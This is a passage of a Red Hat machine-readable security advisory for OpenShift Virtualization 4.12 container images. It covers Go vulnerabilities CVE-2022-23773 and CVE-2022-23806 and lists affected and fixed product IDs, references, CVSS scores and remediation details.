"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23773", }, { category: "external", summary: "RHBZ#2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23773", url: "https://www.cve.org/CVERecord?id=CVE-2022-23773", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", }, { cve: "CVE-2022-23806", cwe: { id: "CWE-252", name: "Unchecked Return Value", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053429", }, ], notes: [ { category: "description", text: "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 & 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: 